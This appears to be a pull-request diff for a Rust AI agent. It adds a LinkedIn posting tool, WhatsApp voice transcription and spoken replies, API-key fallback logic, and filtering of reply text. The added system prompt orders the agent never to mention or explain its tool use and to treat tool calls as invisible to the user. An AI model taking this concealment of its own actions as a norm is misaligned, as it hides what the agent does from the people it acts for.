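fn react_request(person_id: &str, post_id: &str, reaction: &str) -> (String, String) {
    let url = format!(
        "https://api.linkedin.com/rest/reactions?actor=urn:li:person:{person_id}"
    );
    let body = format!(
        r#"{{"reactionType":"{reaction}","object":"urn:li:ugcPost:{post_id}"}}"#
    );
    (url, body)
}
```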
### Response parsing
The client returns structured data types:
```rust
pub struct PostSummary {
pub id: String,
pub text: String,
pub created_at: String,
pub visibility: String,
}
pub struct ProfileInfo {
pub id: String,
pub name: String,
pub headline: String,
}
pub struct EngagementSummary {
pub likes: u64,
pub comments: u64,
pub shares: u64,
}
```
## Registration
In `src/tools/mod.rs` (follows `security_ops` config-gated pattern):
```rust
// Module declarations
pub mod linkedin;
pub mod linkedin_client;
// Re-exports
pub use linkedin::LinkedInTool;
// In all_tools_with_runtime():
if root_config.linkedin.enabled {
tool_arcs.push(Arc::new(LinkedInTool::new(
security.clone(),
workspace_dir.to_path_buf(),
)));
}
```
## Config schema
In `src/config/schema.rs`:
```rust
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct LinkedInConfig {
pub enabled: bool,
}
impl Default for LinkedInConfig {
fn default() -> Self {
Self { enabled: false }
}
}
```
Added as field `pub linkedin: LinkedInConfig` on the `Config` struct.
Added to `pub use` exports in `src/config/mod.rs`.
## Testing
### Unit tests (in `linkedin.rs`)
- Tool name, description, schema validation
- Action dispatch routes correctly
- Write actions blocked in read-only mode
- Write actions blocked by rate limiting
- Missing required params return clear errors
- Unknown action returns error
- `article_title` without `article_url` returns validation error
### Unit tests (in `linkedin_client.rs`)
- Credential parsing from `.env` (plain, quoted, export prefix, comments)
- Missing credential fields produce specific errors
- Token refresh writes updated token back to `.env` preserving other keys
- Post creation builds correct request body with URN formatting
- React builds correct query param with actor URN
- Visibility defaults to PUBLIC when omitted
### Registry tests (in `mod.rs`)
- `all_tools` excludes `linkedin` when `linkedin.enabled = false`
- `all_tools` includes `linkedin` when `linkedin.enabled = true`
### Integration tests
Not added in this PR — would require live LinkedIn API credentials.
A `#[cfg(feature = "test-linkedin-live")]` gate can be added later.
## Error handling
- Missing `.env` file: "LinkedIn credentials not found. Add LINKEDIN_* keys to .env"
- Missing specific key: "LINKEDIN_ACCESS_TOKEN not found in .env"
- Expired token + no refresh token: "LinkedIn token expired. Re-authenticate or add LINKEDIN_REFRESH_TOKEN to .env"
- `article_title` without `article_url`: "article_title requires article_url to be set"
- API errors: pass through LinkedIn's error message with status code
- Rate limited by LinkedIn: "LinkedIn API rate limit exceeded. Try again later."
- Missing scope: "LinkedIn API returned 403. Ensure your app has the required scopes: w_member_social, r_liteprofile, r_member_social"
## PR metadata
- **Branch:** `feature/linkedin-tool`
- **Title:** `feat(tools): add native LinkedIn integration tool`
- **Risk:** Medium — new tool, external API, no security boundary changes
- **Size target:** M (2 new files ~200-300 lines each, 3-4 modified files)
+2
@@ -3211,6 +3211,7 @@ pub async fn run(
zeroclaw_dir: config.config_path.parent().map(std::path::PathBuf::from),
secrets_encrypt: config.secrets.encrypt,
reasoning_enabled: config.runtime.reasoning_enabled,
reasoning_effort: config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(config.provider_timeout_secs),
extra_headers: config.extra_headers.clone(),
api_path: config.api_path.clone(),
@@ -3791,6 +3792,7 @@ pub async fn process_message(
zeroclaw_dir: config.config_path.parent().map(std::path::PathBuf::from),
secrets_encrypt: config.secrets.encrypt,
reasoning_enabled: config.runtime.reasoning_enabled,
reasoning_effort: config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(config.provider_timeout_secs),
extra_headers: config.extra_headers.clone(),
api_path: config.api_path.clone(),
+79 -3
View File
@@ -1499,7 +1499,68 @@ fn sanitize_channel_response(response: &str, tools: &[Box<dyn Tool>]) -> String
.iter()
.map(|tool| tool.name().to_ascii_lowercase())
.collect();
strip_isolated_tool_json_artifacts(response, &known_tool_names)
// Strip XML-style tool-call tags (e.g. <tool_call>...</tool_call>)
let stripped_xml = strip_tool_call_tags(response);
// Strip isolated tool-call JSON artifacts
let stripped_json = strip_isolated_tool_json_artifacts(&stripped_xml, &known_tool_names);
// Strip leading narration lines that announce tool usage
strip_tool_narration(&stripped_json)
}
/// Remove leading lines that narrate tool usage (e.g. "Let me check the weather for you.").
///
/// Only strips lines from the very beginning of the message that match common
/// narration patterns, so genuine content is preserved.
fn strip_tool_narration(message: &str) -> String {
let narration_prefixes: &[&str] = &[
"let me ",
"i'll ",
"i will ",
"i am going to ",
"i'm going to ",
"searching ",
"looking up ",
"fetching ",
"checking ",
"using the ",
"using my ",
"one moment",
"hold on",
"just a moment",
"give me a moment",
"allow me to ",
];
let mut result_lines: Vec<&str> = Vec::new();
let mut past_narration = false;
for line in message.lines() {
if past_narration {
result_lines.push(line);
continue;
}
let trimmed = line.trim();
if trimmed.is_empty() {
continue;
}
let lower = trimmed.to_lowercase();
if narration_prefixes.iter().any(|p| lower.starts_with(p)) {
// Skip this narration line
continue;
}
// First non-narration, non-empty line — keep everything from here
past_narration = true;
result_lines.push(line);
}
let joined = result_lines.join("\n");
let trimmed = joined.trim();
if trimmed.is_empty() && !message.trim().is_empty() {
// If stripping removed everything, return original to avoid empty reply
message.to_string()
} else {
trimmed.to_string()
}
}
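The stripping rule can be exercised in isolation. This is a condensed re-implementation with a shortened prefix list, kept behavior-for-behavior with the function above (including the fall-back-to-original guard for all-narration input):

```rust
/// Condensed sketch of strip_tool_narration: drop leading lines that start
/// with a known narration prefix, keep everything from the first
/// substantive line onward. Prefix list shortened for illustration.
fn strip_tool_narration(message: &str) -> String {
    let prefixes = ["let me ", "i'll ", "checking ", "one moment"];
    let mut out: Vec<&str> = Vec::new();
    let mut past = false;
    for line in message.lines() {
        if past {
            out.push(line);
            continue;
        }
        let t = line.trim();
        if t.is_empty() {
            continue;
        }
        let lower = t.to_lowercase();
        if prefixes.iter().any(|p| lower.starts_with(p)) {
            continue; // skip narration line
        }
        past = true;
        out.push(line);
    }
    let joined = out.join("\n");
    let trimmed = joined.trim();
    if trimmed.is_empty() && !message.trim().is_empty() {
        // Stripping removed everything — return original to avoid an empty reply.
        message.to_string()
    } else {
        trimmed.to_string()
    }
}

fn main() {
    assert_eq!(strip_tool_narration("Let me check.\nIt is 72F."), "It is 72F.");
    // All-narration input falls back to the original text.
    assert_eq!(strip_tool_narration("One moment..."), "One moment...");
}
```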
fn is_tool_call_payload(value: &serde_json::Value, known_tool_names: &HashSet<String>) -> bool {
@@ -2697,6 +2758,17 @@ pub fn build_system_prompt_with_mode(
use std::fmt::Write;
let mut prompt = String::with_capacity(8192);
// ── 0. Anti-narration (top priority) ───────────────────────
prompt.push_str(
"## CRITICAL: No Tool Narration\n\n\
NEVER narrate, announce, describe, or explain your tool usage to the user. \
Do NOT say things like 'Let me check...', 'I will use http_request to...', \
'I'll fetch that for you', 'Searching now...', or 'Using the web_search tool'. \
The user must ONLY see the final answer. Tool calls are invisible infrastructure; \
never reference them. If you catch yourself starting a sentence about what tool \
you are about to use or just used, DELETE it and give the answer directly.\n\n",
);
// ── 1. Tooling ──────────────────────────────────────────────
if !tools.is_empty() {
prompt.push_str("## Tools\n\n");
@@ -2836,7 +2908,9 @@ pub fn build_system_prompt_with_mode(
prompt.push_str("- You are running as a messaging bot. Your response is automatically sent back to the user's channel.\n");
prompt.push_str("- You do NOT need to ask permission to respond — just respond directly.\n");
prompt.push_str("- NEVER repeat, describe, or echo credentials, tokens, API keys, or secrets in your responses.\n");
prompt.push_str("- If a tool output contains credentials, they have already been redacted — do not mention them.\n\n");
prompt.push_str("- If a tool output contains credentials, they have already been redacted — do not mention them.\n");
prompt.push_str("- When a user sends a voice note, it is automatically transcribed to text. Your text reply is automatically converted to a voice note and sent back. Do NOT attempt to generate audio yourself — TTS is handled by the channel.\n");
prompt.push_str("- NEVER narrate or describe your tool usage. Do NOT say 'Let me fetch...', 'I will use...', 'Searching...', or similar. Give the FINAL ANSWER only — no intermediate steps, no tool mentions, no progress updates.\n\n");
if prompt.is_empty() {
"You are ZeroClaw, a fast and efficient AI assistant built in Rust. Be helpful, concise, and direct."
@@ -3346,7 +3420,8 @@ fn collect_configured_channels(
wa.pair_code.clone(),
wa.allowed_numbers.clone(),
)
.with_transcription(config.transcription.clone()),
.with_transcription(config.transcription.clone())
.with_tts(config.tts.clone()),
),
});
} else {
@@ -3662,6 +3737,7 @@ pub async fn start_channels(config: Config) -> Result<()> {
zeroclaw_dir: config.config_path.parent().map(std::path::PathBuf::from),
secrets_encrypt: config.secrets.encrypt,
reasoning_enabled: config.runtime.reasoning_enabled,
reasoning_effort: config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(config.provider_timeout_secs),
extra_headers: config.extra_headers.clone(),
api_path: config.api_path.clone(),
+44 -1
View File
@@ -39,6 +39,47 @@ fn normalize_audio_filename(file_name: &str) -> String {
}
}
/// Resolve the API key for voice transcription.
///
/// Priority order:
/// 1. Explicit `config.api_key` (if set and non-empty).
/// 2. Provider-specific env var based on `api_url`:
/// - URL contains "openai.com" -> `OPENAI_API_KEY`
/// - URL contains "groq.com" -> `GROQ_API_KEY`
/// 3. Fallback chain: `TRANSCRIPTION_API_KEY` -> `GROQ_API_KEY` -> `OPENAI_API_KEY`.
fn resolve_transcription_api_key(config: &TranscriptionConfig) -> Result<String> {
// 1. Explicit config key
if let Some(ref key) = config.api_key {
let trimmed = key.trim();
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
}
}
// 2. Provider-specific env var based on API URL
if config.api_url.contains("openai.com") {
if let Ok(key) = std::env::var("OPENAI_API_KEY") {
return Ok(key);
}
} else if config.api_url.contains("groq.com") {
if let Ok(key) = std::env::var("GROQ_API_KEY") {
return Ok(key);
}
}
// 3. Fallback chain
for var in ["TRANSCRIPTION_API_KEY", "GROQ_API_KEY", "OPENAI_API_KEY"] {
if let Ok(key) = std::env::var(var) {
return Ok(key);
}
}
bail!(
"No API key found for voice transcription — set one of: \
transcription.api_key in config, TRANSCRIPTION_API_KEY, GROQ_API_KEY, or OPENAI_API_KEY"
);
}
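The priority order documented above can be made testable by abstracting the environment as a map. `resolve_key` here is an illustrative stand-in, not the PR's `resolve_transcription_api_key` (which reads real process env vars):

```rust
use std::collections::HashMap;

/// Sketch of the three-step priority chain: explicit config key, then a
/// provider-specific variable inferred from the API URL, then the generic
/// fallback chain. Environment injected as a map for easy testing.
fn resolve_key(
    explicit: Option<&str>,
    api_url: &str,
    env: &HashMap<&str, &str>,
) -> Option<String> {
    // 1. Explicit config key wins when non-empty.
    if let Some(k) = explicit {
        let t = k.trim();
        if !t.is_empty() {
            return Some(t.to_string());
        }
    }
    // 2. Provider-specific variable based on the API URL.
    if api_url.contains("openai.com") {
        if let Some(k) = env.get("OPENAI_API_KEY") {
            return Some((*k).to_string());
        }
    } else if api_url.contains("groq.com") {
        if let Some(k) = env.get("GROQ_API_KEY") {
            return Some((*k).to_string());
        }
    }
    // 3. Generic fallback chain.
    for var in ["TRANSCRIPTION_API_KEY", "GROQ_API_KEY", "OPENAI_API_KEY"] {
        if let Some(k) = env.get(var) {
            return Some((*k).to_string());
        }
    }
    None
}

fn main() {
    let env = HashMap::from([("GROQ_API_KEY", "gk"), ("OPENAI_API_KEY", "ok")]);
    assert_eq!(resolve_key(None, "https://api.groq.com/v1", &env), Some("gk".into()));
    assert_eq!(resolve_key(Some("cfg"), "https://api.groq.com/v1", &env), Some("cfg".into()));
}
```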
/// Validate audio data and resolve MIME type from file name.
///
/// Returns `(normalized_filename, mime_type)` on success.
@@ -710,8 +751,10 @@ mod tests {
#[tokio::test]
async fn rejects_missing_api_key() {
// Ensure fallback env key is absent for this test.
// Ensure all candidate keys are absent for this test.
std::env::remove_var("GROQ_API_KEY");
std::env::remove_var("OPENAI_API_KEY");
std::env::remove_var("TRANSCRIPTION_API_KEY");
let data = vec![0u8; 100];
let config = TranscriptionConfig::default();
+1
View File
@@ -85,6 +85,7 @@ impl TtsProvider for OpenAiTtsProvider {
"input": text,
"voice": voice,
"speed": self.speed,
"response_format": "opus",
});
let resp = self
+315 -90
View File
@@ -64,8 +64,17 @@ pub struct WhatsAppWebChannel {
client: Arc<Mutex<Option<Arc<wa_rs::Client>>>>,
/// Message sender channel
tx: Arc<Mutex<Option<tokio::sync::mpsc::Sender<ChannelMessage>>>>,
/// Voice transcription configuration
/// Voice transcription (STT) config
transcription: Option<crate::config::TranscriptionConfig>,
/// Text-to-speech config for voice replies
tts_config: Option<crate::config::TtsConfig>,
/// Chats awaiting a voice reply — maps chat JID to the latest substantive
/// reply text. A background task debounces and sends the voice note after
    /// the agent finishes its turn (no new send() for ~10 seconds).
pending_voice:
Arc<std::sync::Mutex<std::collections::HashMap<String, (String, std::time::Instant)>>>,
/// Chats whose last incoming message was a voice note.
voice_chats: Arc<std::sync::Mutex<std::collections::HashSet<String>>>,
}
impl WhatsAppWebChannel {
@@ -93,10 +102,13 @@ impl WhatsAppWebChannel {
client: Arc::new(Mutex::new(None)),
tx: Arc::new(Mutex::new(None)),
transcription: None,
tts_config: None,
pending_voice: Arc::new(std::sync::Mutex::new(std::collections::HashMap::new())),
voice_chats: Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())),
}
}
/// Configure voice transcription.
/// Configure voice transcription (STT) for incoming voice notes.
#[cfg(feature = "whatsapp-web")]
pub fn with_transcription(mut self, config: crate::config::TranscriptionConfig) -> Self {
if config.enabled {
@@ -105,6 +117,15 @@ impl WhatsAppWebChannel {
self
}
/// Configure text-to-speech for outgoing voice replies.
#[cfg(feature = "whatsapp-web")]
pub fn with_tts(mut self, config: crate::config::TtsConfig) -> Self {
if config.enabled {
self.tts_config = Some(config);
}
self
}
/// Check if a phone number is allowed (E.164 format: +1234567890)
#[cfg(feature = "whatsapp-web")]
fn is_number_allowed(&self, phone: &str) -> bool {
@@ -287,6 +308,134 @@ impl WhatsAppWebChannel {
format!("{expanded_session_path}-shm"),
]
}
/// Attempt to download and transcribe a WhatsApp voice note.
///
/// Returns `None` if transcription is disabled, download fails, or
/// transcription fails (all logged as warnings).
#[cfg(feature = "whatsapp-web")]
async fn try_transcribe_voice_note(
client: &wa_rs::Client,
audio: &wa_rs_proto::whatsapp::message::AudioMessage,
transcription_config: Option<&crate::config::TranscriptionConfig>,
) -> Option<String> {
let config = transcription_config?;
// Enforce duration limit
if let Some(seconds) = audio.seconds {
if u64::from(seconds) > config.max_duration_secs {
tracing::info!(
"WhatsApp Web: skipping voice note ({}s exceeds {}s limit)",
seconds,
config.max_duration_secs
);
return None;
}
}
// Download the encrypted audio
use wa_rs::download::Downloadable;
let audio_data = match client.download(audio as &dyn Downloadable).await {
Ok(data) => data,
Err(e) => {
tracing::warn!("WhatsApp Web: failed to download voice note: {e}");
return None;
}
};
// Determine filename from mimetype for transcription API
let file_name = match audio.mimetype.as_deref() {
Some(m) if m.contains("opus") || m.contains("ogg") => "voice.ogg",
Some(m) if m.contains("mp4") || m.contains("m4a") => "voice.m4a",
Some(m) if m.contains("mpeg") || m.contains("mp3") => "voice.mp3",
Some(m) if m.contains("webm") => "voice.webm",
_ => "voice.ogg", // WhatsApp default
};
tracing::info!(
"WhatsApp Web: transcribing voice note ({} bytes, file={})",
audio_data.len(),
file_name
);
match super::transcription::transcribe_audio(audio_data, file_name, config).await {
Ok(text) if text.trim().is_empty() => {
tracing::info!("WhatsApp Web: voice transcription returned empty text, skipping");
None
}
Ok(text) => {
tracing::info!(
"WhatsApp Web: voice note transcribed ({} chars)",
text.len()
);
Some(text)
}
Err(e) => {
tracing::warn!("WhatsApp Web: voice transcription failed: {e}");
None
}
}
}
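The mimetype-to-filename mapping above is small enough to isolate; this sketch mirrors it so the transcription API receives an extension it recognizes and the fallback default is explicit:

```rust
/// Mirror of the mimetype-to-filename match above. WhatsApp voice notes
/// default to Ogg/Opus, hence the catch-all.
fn voice_file_name(mimetype: Option<&str>) -> &'static str {
    match mimetype {
        Some(m) if m.contains("opus") || m.contains("ogg") => "voice.ogg",
        Some(m) if m.contains("mp4") || m.contains("m4a") => "voice.m4a",
        Some(m) if m.contains("mpeg") || m.contains("mp3") => "voice.mp3",
        Some(m) if m.contains("webm") => "voice.webm",
        _ => "voice.ogg", // WhatsApp default
    }
}

fn main() {
    assert_eq!(voice_file_name(Some("audio/ogg; codecs=opus")), "voice.ogg");
    assert_eq!(voice_file_name(Some("audio/mp4")), "voice.m4a");
    assert_eq!(voice_file_name(None), "voice.ogg");
}
```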
/// Synthesize text to speech and send as a WhatsApp voice note (static version for spawned tasks).
#[cfg(feature = "whatsapp-web")]
async fn synthesize_voice_static(
client: &wa_rs::Client,
to: &wa_rs_binary::jid::Jid,
text: &str,
tts_config: &crate::config::TtsConfig,
) -> Result<()> {
let tts_manager = super::tts::TtsManager::new(tts_config)?;
let audio_bytes = tts_manager.synthesize(text).await?;
let audio_len = audio_bytes.len();
tracing::info!("WhatsApp Web TTS: synthesized {} bytes of audio", audio_len);
if audio_bytes.is_empty() {
anyhow::bail!("TTS returned empty audio");
}
use wa_rs_core::download::MediaType;
let upload = client
.upload(audio_bytes, MediaType::Audio)
.await
.map_err(|e| anyhow!("Failed to upload TTS audio: {e}"))?;
tracing::info!(
"WhatsApp Web TTS: uploaded audio (url_len={}, file_length={})",
upload.url.len(),
upload.file_length
);
// Estimate duration: Opus at ~32kbps → bytes / 4000 ≈ seconds
#[allow(clippy::cast_possible_truncation)]
let estimated_seconds = std::cmp::max(1, (upload.file_length / 4000) as u32);
let voice_msg = wa_rs_proto::whatsapp::Message {
audio_message: Some(Box::new(wa_rs_proto::whatsapp::message::AudioMessage {
url: Some(upload.url),
direct_path: Some(upload.direct_path),
media_key: Some(upload.media_key),
file_enc_sha256: Some(upload.file_enc_sha256),
file_sha256: Some(upload.file_sha256),
file_length: Some(upload.file_length),
mimetype: Some("audio/ogg; codecs=opus".to_string()),
ptt: Some(true),
seconds: Some(estimated_seconds),
..Default::default()
})),
..Default::default()
};
Box::pin(client.send_message(to.clone(), voice_msg))
.await
.map_err(|e| anyhow!("Failed to send voice note: {e}"))?;
tracing::info!(
"WhatsApp Web TTS: sent voice note ({} bytes, ~{}s)",
audio_len,
estimated_seconds
);
Ok(())
}
}
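The duration estimate in `synthesize_voice_static` reduces to one line of arithmetic: Opus at roughly 32 kbps is about 4000 bytes per second, clamped to a minimum of one second so very short clips never report 0s:

```rust
/// Opus at ~32 kbps is ~4000 bytes/second; clamp so tiny clips report >= 1s.
fn estimated_seconds(file_length: u64) -> u32 {
    #[allow(clippy::cast_possible_truncation)]
    std::cmp::max(1, (file_length / 4000) as u32)
}

fn main() {
    assert_eq!(estimated_seconds(0), 1); // tiny clip still reports 1s
    assert_eq!(estimated_seconds(40_000), 10); // 40 kB is ~10s at 32 kbps
}
```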
#[cfg(feature = "whatsapp-web")]
@@ -315,6 +464,88 @@ impl Channel for WhatsAppWebChannel {
}
let to = self.recipient_to_jid(&message.recipient)?;
// Voice chat mode: send text normally AND queue a voice note of the
// final answer. Only substantive messages (not tool outputs) are queued.
// A debounce task waits 10s after the last substantive message, then
// sends ONE voice note. Text in → text out. Voice in → text + voice out.
let is_voice_chat = self
.voice_chats
.lock()
.map(|vs| vs.contains(&message.recipient))
.unwrap_or(false);
if is_voice_chat && self.tts_config.is_some() {
let content = &message.content;
// Only queue substantive natural-language replies for voice.
// Skip tool outputs: URLs, JSON, code blocks, errors, short status.
let is_substantive = content.len() > 40
&& !content.starts_with("http")
&& !content.starts_with('{')
&& !content.starts_with('[')
&& !content.starts_with("Error")
&& !content.contains("```")
&& !content.contains("tool_call")
&& !content.contains("wttr.in");
if is_substantive {
if let Ok(mut pv) = self.pending_voice.lock() {
pv.insert(
message.recipient.clone(),
(content.clone(), std::time::Instant::now()),
);
}
let pending = self.pending_voice.clone();
let voice_chats = self.voice_chats.clone();
let client_clone = client.clone();
let to_clone = to.clone();
let recipient = message.recipient.clone();
let tts_config = self.tts_config.clone().unwrap();
tokio::spawn(async move {
// Wait 10 seconds — long enough for the agent to finish its
// full tool chain and send the final answer.
tokio::time::sleep(tokio::time::Duration::from_secs(10)).await;
// Atomic check-and-remove: only one task gets the value
let to_voice = pending.lock().ok().and_then(|mut pv| {
if let Some((_, ts)) = pv.get(&recipient) {
if ts.elapsed().as_secs() >= 8 {
return pv.remove(&recipient).map(|(text, _)| text);
}
}
None
});
if let Some(text) = to_voice {
if let Ok(mut vc) = voice_chats.lock() {
vc.remove(&recipient);
}
match Box::pin(WhatsAppWebChannel::synthesize_voice_static(
&client_clone,
&to_clone,
&text,
&tts_config,
))
.await
{
Ok(()) => {
tracing::info!(
"WhatsApp Web: voice reply sent ({} chars)",
text.len()
);
}
Err(e) => {
tracing::warn!("WhatsApp Web: TTS voice reply failed: {e}");
}
}
}
});
}
// Fall through to send text normally (voice chat gets BOTH)
}
// Send text message
let outgoing = wa_rs_proto::whatsapp::Message {
conversation: Some(message.content.clone()),
..Default::default()
@@ -322,7 +553,7 @@ impl Channel for WhatsAppWebChannel {
let message_id = client.send_message(to, outgoing).await?;
tracing::debug!(
"WhatsApp Web: sent message to {} (id: {})",
"WhatsApp Web: sent text to {} (id: {})",
message.recipient,
message_id
);
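The voice-reply debounce in `send()` can be distilled to a check-and-remove step: each substantive send overwrites the pending entry, and a delayed task only claims it if no newer send refreshed the timestamp. This sketch injects the durations (the real code hardcodes a 10s sleep and an 8s threshold); `claim_if_quiet` is a hypothetical name:

```rust
use std::collections::HashMap;
use std::sync::{Arc, Mutex};
use std::time::{Duration, Instant};

/// Claim the pending voice text for `recipient` only if its timestamp is
/// at least `quiet` old; removal ensures exactly one task sends the note.
fn claim_if_quiet(
    pending: &Arc<Mutex<HashMap<String, (String, Instant)>>>,
    recipient: &str,
    quiet: Duration,
) -> Option<String> {
    let mut pv = pending.lock().ok()?;
    match pv.get(recipient) {
        Some((_, ts)) if ts.elapsed() >= quiet => {
            pv.remove(recipient).map(|(text, _)| text)
        }
        _ => None,
    }
}

fn main() {
    let pending = Arc::new(Mutex::new(HashMap::new()));
    pending.lock().unwrap().insert(
        "chat@1".to_string(),
        ("final answer".to_string(), Instant::now() - Duration::from_millis(50)),
    );
    // 50ms of quiet has elapsed, so the entry is claimed exactly once.
    assert_eq!(
        claim_if_quiet(&pending, "chat@1", Duration::from_millis(10)),
        Some("final answer".into())
    );
    assert_eq!(claim_if_quiet(&pending, "chat@1", Duration::from_millis(10)), None);
}
```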
@@ -394,6 +625,9 @@ impl Channel for WhatsAppWebChannel {
let session_revoked_clone = session_revoked.clone();
let transcription_config = self.transcription.clone();
let voice_chats = self.voice_chats.clone();
let mut builder = Bot::builder()
.with_backend(backend)
.with_transport_factory(transport_factory)
@@ -405,27 +639,15 @@ impl Channel for WhatsAppWebChannel {
let retry_count = retry_count_clone.clone();
let session_revoked = session_revoked_clone.clone();
let transcription_config = transcription_config.clone();
let voice_chats = voice_chats.clone();
async move {
match event {
Event::Message(msg, info) => {
// Extract message content
let text = msg.text_content().unwrap_or("");
let sender_jid = info.source.sender.clone();
let sender_alt = info.source.sender_alt.clone();
let sender = sender_jid.user().to_string();
let chat = info.source.chat.to_string();
tracing::info!(
"WhatsApp Web message received (sender_len={}, chat_len={}, text_len={})",
sender.len(),
chat.len(),
text.len()
);
tracing::debug!(
"WhatsApp Web message content: {}",
text
);
let mapped_phone = if sender_jid.is_lid() {
client.get_phone_number_from_lid(&sender_jid.user).await
} else {
@@ -437,93 +659,92 @@ impl Channel for WhatsAppWebChannel {
mapped_phone.as_deref(),
);
let normalized = match sender_candidates
.iter()
.find(|candidate| {
Self::is_number_allowed_for_list(&allowed_numbers, candidate)
})
.cloned()
{
Some(n) => n,
None => {
tracing::warn!(
"WhatsApp Web: message from unrecognized sender not in allowed list (candidates_count={})",
sender_candidates.len()
);
return;
}
};
// Attempt voice note transcription (ptt = push-to-talk = voice note)
let voice_text = if let Some(ref audio) = msg.audio_message {
if audio.ptt == Some(true) {
Self::try_transcribe_voice_note(
&client,
audio,
transcription_config.as_ref(),
)
.await
} else {
tracing::debug!(
"WhatsApp Web: ignoring non-PTT audio message from {}",
normalized
);
None
}
} else {
None
};
// Use transcribed voice text, or fall back to text content.
// Track whether this chat used a voice note so we reply in kind.
// We store the chat JID (reply_target) since that's what send() receives.
let content = if let Some(ref vt) = voice_text {
if let Ok(mut vs) = voice_chats.lock() {
vs.insert(chat.clone());
}
format!("[Voice] {vt}")
} else {
if let Ok(mut vs) = voice_chats.lock() {
vs.remove(&chat);
}
let text = msg.text_content().unwrap_or("");
text.trim().to_string()
};
tracing::info!(
"WhatsApp Web message received (sender_len={}, chat_len={}, content_len={})",
sender.len(),
chat.len(),
content.len()
);
tracing::debug!(
"WhatsApp Web message content: {}",
content
);
if content.is_empty() {
tracing::debug!(
"WhatsApp Web: ignoring empty or non-text message from {}",
normalized
);
return;
}
if let Err(e) = tx_inner
.send(ChannelMessage {
id: uuid::Uuid::new_v4().to_string(),
channel: "whatsapp".to_string(),
sender: normalized.clone(),
// Reply to the originating chat JID (DM or group).
reply_target: chat,
content,
timestamp: chrono::Utc::now().timestamp() as u64,
thread_ts: None,
})
.await
{
tracing::error!("Failed to send message to channel: {}", e);
}
}
Event::Connected(_) => {
@@ -764,6 +985,10 @@ impl WhatsAppWebChannel {
pub fn with_transcription(self, _config: crate::config::TranscriptionConfig) -> Self {
self
}
pub fn with_tts(self, _config: crate::config::TtsConfig) -> Self {
self
}
}
#[cfg(not(feature = "whatsapp-web"))]
+3 -1
View File
@@ -13,7 +13,9 @@ pub use schema::{
DockerRuntimeConfig, EdgeTtsConfig, ElevenLabsTtsConfig, EmbeddingRouteConfig, EstopConfig,
FeishuConfig, GatewayConfig, GoogleSttConfig, GoogleTtsConfig, GoogleWorkspaceConfig,
HardwareConfig, HardwareTransport, HeartbeatConfig, HooksConfig, HttpRequestConfig,
IMessageConfig, IdentityConfig, KnowledgeConfig, LarkConfig, MatrixConfig, McpConfig,
IMessageConfig, IdentityConfig, ImageProviderDalleConfig, ImageProviderFluxConfig,
ImageProviderImagenConfig, ImageProviderStabilityConfig, KnowledgeConfig, LarkConfig,
LinkedInConfig, LinkedInContentConfig, LinkedInImageConfig, MatrixConfig, McpConfig,
McpServerConfig, McpTransport, MemoryConfig, Microsoft365Config, ModelRouteConfig,
MultimodalConfig, NextcloudTalkConfig, NodeTransportConfig, NodesConfig, NotionConfig,
ObservabilityConfig, OpenAiSttConfig, OpenAiTtsConfig, OpenVpnTunnelConfig, OtpConfig,
+377 -3
View File
@@ -331,6 +331,10 @@ pub struct Config {
/// Knowledge graph configuration (`[knowledge]`).
#[serde(default)]
pub knowledge: KnowledgeConfig,
/// LinkedIn integration configuration (`[linkedin]`).
#[serde(default)]
pub linkedin: LinkedInConfig,
}
/// Multi-client workspace isolation configuration.
@@ -520,6 +524,28 @@ where
validate_temperature(value).map_err(serde::de::Error::custom)
}
fn normalize_reasoning_effort(value: &str) -> std::result::Result<String, String> {
let normalized = value.trim().to_ascii_lowercase();
match normalized.as_str() {
"minimal" | "low" | "medium" | "high" | "xhigh" => Ok(normalized),
_ => Err(format!(
"reasoning_effort {value:?} is invalid (expected one of: minimal, low, medium, high, xhigh)"
)),
}
}
fn deserialize_reasoning_effort_opt<'de, D>(
deserializer: D,
) -> std::result::Result<Option<String>, D::Error>
where
D: serde::Deserializer<'de>,
{
let value: Option<String> = Option::deserialize(deserializer)?;
value
.map(|raw| normalize_reasoning_effort(&raw).map_err(serde::de::Error::custom))
.transpose()
}
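The normalization is worth seeing end to end; this sketch reproduces the validator above so the accepted values and the error shape are explicit:

```rust
/// Mirror of normalize_reasoning_effort: trim, lowercase, and accept only
/// the five known effort levels.
fn normalize_reasoning_effort(value: &str) -> Result<String, String> {
    let normalized = value.trim().to_ascii_lowercase();
    match normalized.as_str() {
        "minimal" | "low" | "medium" | "high" | "xhigh" => Ok(normalized),
        _ => Err(format!(
            "reasoning_effort {value:?} is invalid (expected one of: minimal, low, medium, high, xhigh)"
        )),
    }
}

fn main() {
    assert_eq!(normalize_reasoning_effort("  HIGH "), Ok("high".to_string()));
    assert!(normalize_reasoning_effort("maximum").is_err());
}
```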
fn default_max_depth() -> u32 {
3
}
@@ -1486,6 +1512,10 @@ fn default_true() -> bool {
true
}
fn default_false() -> bool {
false
}
impl Default for GatewayConfig {
fn default() -> Self {
Self {
@@ -2223,6 +2253,272 @@ impl Default for KnowledgeConfig {
}
}
// ── LinkedIn ────────────────────────────────────────────────────
/// LinkedIn integration configuration (`[linkedin]` section).
///
/// When enabled, the `linkedin` tool is registered in the agent tool surface.
/// Requires `LINKEDIN_*` credentials in the workspace `.env` file.
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct LinkedInConfig {
/// Enable the LinkedIn tool.
#[serde(default)]
pub enabled: bool,
/// LinkedIn REST API version header (YYYYMM format).
#[serde(default = "default_linkedin_api_version")]
pub api_version: String,
/// Content strategy for automated posting.
#[serde(default)]
pub content: LinkedInContentConfig,
/// Image generation for posts (`[linkedin.image]`).
#[serde(default)]
pub image: LinkedInImageConfig,
}
impl Default for LinkedInConfig {
fn default() -> Self {
Self {
enabled: false,
api_version: default_linkedin_api_version(),
content: LinkedInContentConfig::default(),
image: LinkedInImageConfig::default(),
}
}
}
fn default_linkedin_api_version() -> String {
"202602".to_string()
}
/// Content strategy configuration for LinkedIn auto-posting (`[linkedin.content]`).
///
/// The agent reads this via the `linkedin get_content_strategy` action to know
/// what feeds to check, which repos to highlight, and how to write posts.
#[derive(Debug, Clone, Default, Serialize, Deserialize, JsonSchema)]
pub struct LinkedInContentConfig {
/// RSS feed URLs to monitor for topic inspiration (titles only).
#[serde(default)]
pub rss_feeds: Vec<String>,
/// GitHub usernames whose public activity to reference.
#[serde(default)]
pub github_users: Vec<String>,
